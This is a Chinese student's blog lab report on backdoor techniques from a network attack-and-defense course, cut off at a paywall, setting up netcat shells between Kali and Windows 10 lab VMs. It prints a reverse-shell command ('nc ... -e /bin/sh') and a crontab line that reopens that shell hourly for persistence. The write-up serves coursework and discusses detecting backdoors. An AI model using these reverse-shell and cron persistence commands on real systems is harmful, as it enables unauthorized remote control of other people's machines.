20202413 2021-2022-2 《网络与系统攻防技术》实验二实验报告

已于 2023-03-23 15:10:10 修改
阅读量534 收藏 2
点赞数
文章标签: 网络 linux
于 2023-03-21 16:25:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51198288/article/details/129679239
版权
本文详细记录了一次网络与系统攻防技术的实验过程,包括使用netcat和socat在Linux与Windows之间获取Shell,通过MSFmeterpreter进行音频、摄像头数据的获取和提权操作。实验涉及创建定时任务、生成可执行文件以及shellcode注入,同时也讨论了检测和防范后门的方法。
摘要由CSDN通过智能技术生成

20202413 2021-2022-2 《网络与系统攻防技术》实验二实验报告

文章目录

1.实验内容

1.1 实验要求

  1. win主机使用netcat获取linux主机的Shell,接着利用该Shell使用cron启动自定义任务
  2. linux主机使用socat获取win主机的Shell, 接着利用该Shell添加任务计划程序
  3. linux主机使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到win主机,进而获取win主机Shell
  4. linux主机使用MSF meterpreter(或其他软件)获取win主机音频、摄像头、击键记录等内容,并尝试绕过UAC限制提权
  5. linux主机使用MSF生成shellcode,注入到实验一的pwn1中,获取反弹连接Shell

1.2 问题回答

  1. 例举你能想到的一个后门进入到你系统中的可能方式?
    我去第三方网站下载了某个破解版软件,该破解版软件中留了后门,一旦运行软件就会出事。
  2. 例举你知道的后门如何启动起来(win及linux)的方式?
    开机自启动,与其他程序绑定,通过定时任务触发等等。
  3. Meterpreter有哪些给你印象深刻的功能?
    能获取目标主机音频、摄像头、击键记录等内容,甚至能进行提权,使得被攻击方的隐私信息暴露无遗。
  4. 如何发现自己有系统有没有被安装后门?
    • 安装杀毒软件,定期检测主机安全状况,及时更新杀软的特征库
    • win主机可以通过“任务计划程序”和“注册表”查看是否有可疑任务
    • 留意使用过程中主机是否出现异常现象,如磁盘损坏、无故黑屏蓝屏等等

2.实验过程

2.1 实验环境

  • 两台虚拟机,一个是kali(192.168.3.23),另一个是win10(192.168.3.30),均开启桥接模式
  • ncat和socat。由于kali中已经默认安装了这两个工具,仅需要下载到win10中即可。下载链接:NetSec,选择下载量最大的两个即可。

2.2 使用netcat获取主机操作Shell,cron启动某项任务

  • netcat作为底层工具,可实现TCP/UDP数据收发
  • linux中任务的定时启动通过crontab进行

首先在win10中开启监听,注意进入到ncat.exe所在的工作目录下:

ncat.exe -l -p 2413	#端口号2413

接着在kali中通过ncat与win10主机建立反弹式连接:

nc 192.168.3.33 2413 -e /bin/sh	#IP是win10主机的,端口保持一致

可见成功获取了kali的shell:
在这里插入图片描述
在这里插入图片描述
如果在linux终端上执行下面的命令,结果如下:

crontab -e	#执行文字编辑器来设定时程表,这里选择的是2:/usr/bin/vim.basic
30 * * * * /bin/netcat 192.168.3.30 2413 -e /bin/sh	#IP地址是win主机的,在每小时的第30分钟启动任务
crontab -l	#查看时程表

请添加图片描述在这里插入图片描述
但是我们现在需要在win10中通过刚刚获得的shell来进行操作:
在这里插入图片描述
在这里插入图片描述
我们会发现kali终端弹出了警告,并且在win10获得的shell中无法进行文件修改操作。因此我们考虑从kali中记录定时任务的文件本身(/var/spool/cron目录下)入手,以root身份打开:
在这里插入图片描述在这里插入图片描述

  • 注意,crontabs目录下如果没有root文件&
最低0.47元/天 解锁文章
weixin_51198288
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
20202413 2021-2022-2 《网络系统攻防技术实验实验报告
weixin_51198288的博客
04-05 833
感谢前人栽树
20202413 2021-2022-2 《网络系统攻防技术实验实验报告
weixin_51198288的博客
03-28 763
实验做不出来,人麻了
20202407 2021-2022-2 《网络系统攻防技术实验实验报告
m0_65266036的博客
03-29 117
(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程(2)使用socat获取主机操作Shell, 任务计划启动(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。
20202418 2022-2023-2 《网络系统攻防技术实验实验报告
Fish_eggs的博客
03-25 115
今天做完实验后,我是真感觉自己是个网络空间安全专业的学生了,我居然能够自己制作一个后门软件(虽然很容易被封杀而且必须在同一局域网内),远程操控电脑,获得目标主机的录音权限、截屏权限、摄像头权限、键盘记录权限等,真成一个正儿八经的黑客了。通过这一次的实验,我熟悉了ncat和socat以及meterpreter的使用,同时还熟悉了上一次实验一的gdb调试和地址的查找,学会了很多新的知识。能够轻而易举的获得目标主机的摄像头和麦克风权限,还能够进行截屏,获得键盘记录等,甚至能够尝试提权,让人感慨。
20202407 2021-2022-2 《网络系统攻防技术实验实验报告
m0_65266036的博客
04-19 403
本次实验所需要使用的工具相比前几次更丰富,耗时也更长。恶意代码的分析方法主要分为静态分析方法和动态分析方法。这两种方法在本次实验中都有所涉及。静态分析方法是指在不执行程序的条件下进行分析,如反汇编分析等;而动态分析方法是指在恶意代码执行的情况下,利用调试工具对恶意代码实施跟踪和观察,比如抓包等等,确定恶意代码的工作过程,以便作进一步分析。
20202414 2022-2023-2 《网络系统攻防技术实验实验报告
h118189的博客
05-16 1123
本次实验学习目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。我进行了以下实践,对msf进行攻击有了更深的理解:1.1 一个主动攻击实践,使用使用漏洞为永恒之蓝(MS17_010);1.2 一个针对浏览器的攻击,使用漏洞为极光漏洞(MS10_002);1.3 一个针对客户端的攻击,实施了针对Adobe的漏洞的攻击;1.4 成功应用任何一个辅助模块。
UDP协议
hyldzbg的博客
09-04 895
把当前要计算校验和的数据,每个字节,都进行累加,把结果保存到这两个字节的变量(校验和)中,过程中溢出也没关系,如果中间某个数据,出现传输错误,第次计算的校验和就会和第一次不同(CRC这个算法其实不是特别靠谱,比如如果前一个字节大小少1,后一个字节大小多1,那么最后得到的校验和任然相同,但是数据可能已经不同了)。描绘这个数据报的报文长度(包含报头),这里的长度是指该报文有多少个字节,因为只有16位比特位的大小,因为数据传输可能会出错,所以需要一定的方法知道所传输的数据是否正确传输。
网络第五章:多路转接
qincjun的博客
09-05 593
2.HTTP1.1采用了长连接的方式来进行通信:建立连接,服务器响应完之后,不断开连接,活跃的用户对服务器发送请求,服务器都会正常响应;对不活跃的用户,不进行任何操作;events是分配好的epoll_event结构体数组.epoll将会把发生的事件赋值到events数组中 (events不可以是空指针,内核只负责把数据复制到这个events数组中,不会去帮助我们在用户态中分配内存).epoll通过这些值的设定,来监视fd的行为,如果fd做了这些行为,则会通过epoll_wait来反馈给上层,进行处理。
JAVA—网络通信
Hismybestlove的博客
09-05 1492
本文是学习网络通信入门和简单了解UDP协议和TCP协议,学习和了解CS架构和简单了解BS架构和HTTP协议
​数据链路层——流量控制&可靠传输机制 ​
最新发布
qq_25467441的博客
09-09 562
例题:一个信道的数据传输率为4kb/s ,单向传播时延为30ms ,如果使停止-等待协议的信道最大利用率达到80%,要求的数据帧长度至少为。设数据帧的长度为L比特,则发送方发送全部的数据需要时间:L/4。“停止-等待”就是每发送完一个分组就停止发送,等待对方确认,在收到确认后再发送下一个分组。因为是在讨论可靠传输的原理,所以并不考虑数据是在哪一个层次上传送的。发送方在一个发送周期内,有效地发送数据所需要的时间占整个发送周期的比率。数据链路层的流量控制是点对点的,而传输层的流量控制是端到端的。
200 Gb/s和400 Gb/s网络
dncsk的专栏
09-07 1389
116.200 Gb/s和400 Gb/s网络简介写在前面 :1.需要英文原文请自行官网下载2.本人无授权故亦不接受相关付费服务 如有商业性需求建议寻找有资质的书籍供应商购买3.翻译纯粹为爱发电,因为机器翻译所以错乱较多 建议参照英文原文对比使用 4.欢迎评论区提出建议或意见 原则上不删除评论 原则上不回复私信 和解呈现200GBASE-RPCSPMDIEEEStd802.3-2022,IEEE以太网标准第八节116.200Gb/s和400Gb/s网络116.1概述116.1范围本条款描述了200千兆位和4
[网络]HTTP协议 Cookie与Session
m0_74910646的博客
09-07 747
HTTP Cookie(也称为 Web Cookie、浏览器 Cookie 或简称 Cookie)是服务器发送到 用户浏览器并保存在浏览器上的一小块数据,它会在浏览器之后向同一服务器再次发 起请求时被携带并发送到服务器上。通常,它用于告知服务端两个请求是否来自同一浏览器,如保持用户的登录状态、记录用户偏好等。HTTP Session 是服务器用来跟踪用户与服务器交互期间用户状态的机制。由于 HTTP 协议是无状态的(每个请求都是独立的),因此服务器需要通过 Session 来记住用户的信息。
145-Linux权限维持&Rootkit后门&Strace监控&Alias别名&Cron定时任务
DamnVanish的博客
09-07 807
Linux中最强权限维持rootkit
网络协议】了解一下HTTP 与 HTTPS 的区别
想写博客却不会写,那能怎么办?抓紧练习咯!
09-05 981
2.身份认证:服务器向客户端出示TLS证书,客户端验证证书的有效性和服务器身份,确保连接到的是正确的服务提供者。因为 HTTPS 都是基于 TCP 传输协议实现的,得先建立完可靠的 TCP 连接才能做 TLS 握手的事情。1.加密通信:HTTPS通过TLS证书实现对数据的加密处理,只有当拥有正确密钥的接收方才能解读数据内容。HTTPS 建立连接的过程,先进行 TCP 三次握手,再进行 TLS 四次握手。3.数据完整性:除了加密外,HTTPS还利用。明文传输:数据以明文的形式传输,不加密,容易被截获和窃听。
综合DHCP、ACL、NAT、Telnet和PPPoE进行网络设计练习
m0_62909438的博客
09-07 1114
通过学习到的DHCP、NAT、ACL、Telnet和PPPoE技术,进行综合实验配置,掌握这些技术的配置,了解其用法,加深命令印象。
WireShark抓包软件介绍和安装
m0_49476241的博客
09-08 912
Wireshark 是一个广泛使用的网络协议分析工具,它提供了强大的功能用于捕获、分析和调试网络流量。
【软考中级攻略站】-软件设计师(4)-计算机网络基础
X_StarX的博客
09-08 1283
局域网:小范围内的网络,比如教室或家庭。城域网:城市范围内的网络,连接多个局域网。广域网:覆盖很大范围的网络,如互联网。个人区域网:个人身边的设备组成的小网络。星型拓扑:所有设备连接到一个中心节点。总线型拓扑:所有设备连接到一条主干线上。环型拓扑:设备形成一个闭合的环。树型拓扑:层次结构,从中心节点向下分支。网状拓扑:设备之间有多重连接。混合拓扑:结合多种拓扑结构。IPv4:32位地址,格式为四个点分十进制数字,如。IPv6:128位地址,格式为八个冒号十六进制数字,如。
(php伪随机数生成)[GWCTF 2019]枯燥的抽奖
weixin_73399382的博客
09-04 453
审核源码发现加载check.php,审计发现使用了mt_rand()函数,这个函数生成的值是伪随机的。cd进去输入make后编译出的文件先chmod +x一下。然后先用脚本将所给字符串处理成工具需要的数据形式。利用原计算函数算出完整字符串。按我这个格式输入计算出种子。kali里面输入下载工具。
网络攻防技术精要:虚拟网络与安全防护
"网络攻防实践复习资料,涵盖了网络攻防技术框架、物理与社会工程学攻击、软件安全漏洞生命周期、Web安全、VMWare虚拟网络、HoneyPot和HoneyNet、信息收集、扫描技术、OS指纹识别、局域网嗅探、Wireshark使用、网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值